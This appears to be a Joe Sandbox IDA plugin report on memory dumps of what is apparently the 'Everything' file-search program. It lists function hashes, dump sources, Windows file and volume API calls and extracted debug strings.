                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eee6d8c8f6439d6345ac40159bd9820a9d048cff54a824ceac9dc696e407f3cf
                                                                                                            • Instruction ID: 06d4846df28618f7fcb20558e2e975db303154555ef568ea000c1fa1715eb097
                                                                                                            • Opcode Fuzzy Hash: eee6d8c8f6439d6345ac40159bd9820a9d048cff54a824ceac9dc696e407f3cf
                                                                                                            • Instruction Fuzzy Hash: 9131C863E0D5C944DB524F65402027CBFB2EB22B84BDE9471DAD8863C7EE1ED862E700
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 391988a73083d67feebe9fe75e32d9df349c5a23bedb96cce2759dc4c65f289e
                                                                                                            • Instruction ID: fcc73b2552132e331293a217699e00b6d6b9bd63a85fc166f3af887068afde0d
                                                                                                            • Opcode Fuzzy Hash: 391988a73083d67feebe9fe75e32d9df349c5a23bedb96cce2759dc4c65f289e
                                                                                                            • Instruction Fuzzy Hash: 343147B3E0D7D585DA158AA6664013AA761FF4A7C4F048032CF6A87B45FE39E515F300
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 96c22d328170625f99c672d9d6881588b0ff24a196122a0edcc88fb1e9feefe8
                                                                                                            • Instruction ID: ce215a64f5fa6a48baf5278bc3a3cc254701b2ce8c7a18658f381971f6743e68
                                                                                                            • Opcode Fuzzy Hash: 96c22d328170625f99c672d9d6881588b0ff24a196122a0edcc88fb1e9feefe8
                                                                                                            • Instruction Fuzzy Hash: BD210C73E0C5D954DB518B7640102B97FA1AB42BC0B4F8472DAF893787EE1DD842E710
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5addf4b4413896a12293aa234b80d0114c1073d9df57387f92b7399468aa07fd
                                                                                                            • Instruction ID: 8272229ea70505c82c82bd07698fd55b94fb9339e345f48f8d5f18085ca6ec91
                                                                                                            • Opcode Fuzzy Hash: 5addf4b4413896a12293aa234b80d0114c1073d9df57387f92b7399468aa07fd
                                                                                                            • Instruction Fuzzy Hash: C721EFA6F04B5AC2DF148F4AE5802BAB320FB01BD8F0A5126DB4D43302EF39E4A1D710
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 82ac90bd5fa67493feab81e594db82532306f90c1664e59dfcc6fd349b39b258
                                                                                                            • Instruction ID: 00c74fb16b6e0358b310f753d7fc512e614896428ab1681bc508806ca44b6a83
                                                                                                            • Opcode Fuzzy Hash: 82ac90bd5fa67493feab81e594db82532306f90c1664e59dfcc6fd349b39b258
                                                                                                            • Instruction Fuzzy Hash: 4601F556D2A07B41FE3476D5D401AF461A2DF617A1F146832CC0DC67C1FE6DB881B605
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$ErrorFreeLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 2874822613-0
                                                                                                            • Opcode ID: 7f2ce0b0f1c79dbc8a5ce8ebe772d7bb3f93b6c931752b1eab44319906290483
                                                                                                            • Instruction ID: 2c16da0637317ec3914ff4425b7245abd6f44b3b61d857ef5e09eba605e38bf4
                                                                                                            • Opcode Fuzzy Hash: 7f2ce0b0f1c79dbc8a5ce8ebe772d7bb3f93b6c931752b1eab44319906290483
                                                                                                            • Instruction Fuzzy Hash: 2D11C63290D78A5ADB075FA1A95016E37B0BB86B50B894432CB4CCB783EF2CE460D380
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 975e6028a6fa850667a209d5b925211f63c8693f6342a381516389ea1caec6a0
                                                                                                            • Instruction ID: b88d3c75871380f5f92fb7a958cee563ba84dc816cfd739e9536bd576d654fe1
                                                                                                            • Opcode Fuzzy Hash: 975e6028a6fa850667a209d5b925211f63c8693f6342a381516389ea1caec6a0
                                                                                                            • Instruction Fuzzy Hash: F2E0D865D4D5A904D7074F71142067E7A717752B06FA47061ED8CC3391EE3E9511E244
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 04c726d9fb66bc2e908ea1702ab4d085f6cd6cdc5665ae135f74781fd0ec7076
                                                                                                            • Instruction ID: 9d59fb827e9e9c836a1fc540d3f03b8c64b354eb43eab324f5c2b5f564ab9199
                                                                                                            • Opcode Fuzzy Hash: 04c726d9fb66bc2e908ea1702ab4d085f6cd6cdc5665ae135f74781fd0ec7076
                                                                                                            • Instruction Fuzzy Hash: B5E08611B1958580FE548E52D1817BE9225DF2AFC4E1C6430DF9D4B7C7FE5CD4916B04
                                                                                                            APIs
                                                                                                            • OpenFileById.KERNEL32 ref: 00007FF63D555ABE
                                                                                                            • GetFileInformationByHandle.KERNEL32 ref: 00007FF63D555AD6
                                                                                                            • CloseHandle.KERNEL32 ref: 00007FF63D555B65
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceFrequency.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524149
                                                                                                              • Part of subcall function 00007FF63D524140: QueryPerformanceCounter.KERNEL32(?,?,?,?,00007FF63D47EC98), ref: 00007FF63D524158
                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF63D4BD508), ref: 00007FF63D55B0BB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandlePerformanceQuery$CloseCounterErrorFrequencyInformationLastOpen
                                                                                                            • String ID: ($($GetFileInformationByHandle fail %d for FRN %016I64x%016I64x$OpenFileById failed %d for FRN %016I64x%016I64x$_service_client_ioctrl %u, s %u r %u$_service_client_ioctrl reply %d in %f seconds$no method for opening by frn.$set last error %d
                                                                                                            • API String ID: 1958418733-2814543882
                                                                                                            • Opcode ID: e097fd0587f5a3f1e4c3a2412f8b1b50bbb010010aa445bb5e044e0b9ec92e7b
                                                                                                            • Instruction ID: be80cffeddda3e75841db517bba25f52d5ac3735fbf024ca61a12bd5d3845395
                                                                                                            • Opcode Fuzzy Hash: e097fd0587f5a3f1e4c3a2412f8b1b50bbb010010aa445bb5e044e0b9ec92e7b
                                                                                                            • Instruction Fuzzy Hash: 85A1D672A0864A86EB10CF95E44437D73A1FB48BA8F144235DE6E87794EF3CE449E740
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Volume$MountNamePoint$DeviceQuery
                                                                                                            • String ID: :$:$?$?$QueryDosDevice %S %S$\$\$\$\$\$\??\
                                                                                                            • API String ID: 3441149253-3420442896
                                                                                                            • Opcode ID: 8afe324ceb0d01cb5412a8c4d476c0c7017c412823e954a3dca652a29e91716d
                                                                                                            • Instruction ID: e31071781512b00c9a6b8d35173a0e41ba2c181b81e414e98589e22dc02cd233
                                                                                                            • Opcode Fuzzy Hash: 8afe324ceb0d01cb5412a8c4d476c0c7017c412823e954a3dca652a29e91716d
                                                                                                            • Instruction Fuzzy Hash: ED510766E1824A91EB718B90E4403BA73B0FF94768F005135EE4E82B88FF7CE555DB06
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D4B6950: SetEvent.KERNEL32(?,?,?,00007FF63D4BE8F2,?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4B697B
                                                                                                              • Part of subcall function 00007FF63D4B6950: SetEvent.KERNEL32(?,?,?,00007FF63D4BE8F2,?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4B6988
                                                                                                              • Part of subcall function 00007FF63D4B6950: CloseHandle.KERNEL32(?,?,?,00007FF63D4BE8F2,?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4B69A4
                                                                                                              • Part of subcall function 00007FF63D4B6950: CloseHandle.KERNEL32(?,?,?,00007FF63D4BE8F2,?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4B69B1
                                                                                                              • Part of subcall function 00007FF63D4B6950: CloseHandle.KERNEL32(?,?,?,00007FF63D4BE8F2,?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4B69FA
                                                                                                              • Part of subcall function 00007FF63D4B6950: CloseHandle.KERNEL32(?,?,?,00007FF63D4BE8F2,?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4B6A11
                                                                                                              • Part of subcall function 00007FF63D4B6950: CloseHandle.KERNEL32(?,?,?,00007FF63D4BE8F2,?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4B6A4A
                                                                                                              • Part of subcall function 00007FF63D4B6950: CloseHandle.KERNEL32(?,?,?,00007FF63D4BE8F2,?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4B6A61
                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BE90A
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BE92F
                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BE975
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BE997
                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BE9BC
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BE9DE
                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BEA25
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BEA47
                                                                                                            • UnregisterDeviceNotification.USER32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BEA90
                                                                                                            • CloseHandle.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BEA9F
                                                                                                            • CloseHandle.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BEAAF
                                                                                                              • Part of subcall function 00007FF63D55A710: EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF63D4BE903,?,?,?,00007FF63D4960D4), ref: 00007FF63D55A730
                                                                                                              • Part of subcall function 00007FF63D55A710: LeaveCriticalSection.KERNEL32(?,?,?,?,?,00007FF63D4BE903,?,?,?,00007FF63D4960D4), ref: 00007FF63D55A747
                                                                                                            • CloseHandle.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BEABE
                                                                                                            • UnregisterDeviceNotification.USER32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BEB04
                                                                                                            • CloseHandle.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BEB13
                                                                                                            • CloseHandle.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BEB23
                                                                                                            • CloseHandle.KERNEL32(?,?,?,00007FF63D4960D4,?,?,?,?,?,?,?,00007FF63D4829AD), ref: 00007FF63D4BEB32
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CriticalSection$EnterLeave$DeviceEventNotificationUnregister
                                                                                                            • String ID:
                                                                                                            • API String ID: 393589949-0
                                                                                                            • Opcode ID: ad25cd386db7334baf5b4d7161608f330d2920ad55ac5174ef9ebc8c4154b0ae
                                                                                                            • Instruction ID: 27a254a30643a3e34a226e2b3306b3f0ef2779a68b8612fa9ac68494b2a6d98c
                                                                                                            • Opcode Fuzzy Hash: ad25cd386db7334baf5b4d7161608f330d2920ad55ac5174ef9ebc8c4154b0ae
                                                                                                            • Instruction Fuzzy Hash: 6F919221B09A4A91EA4CDFA195402BD6364FF95BA4F080131DFBE837D6EF3CE425A340
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
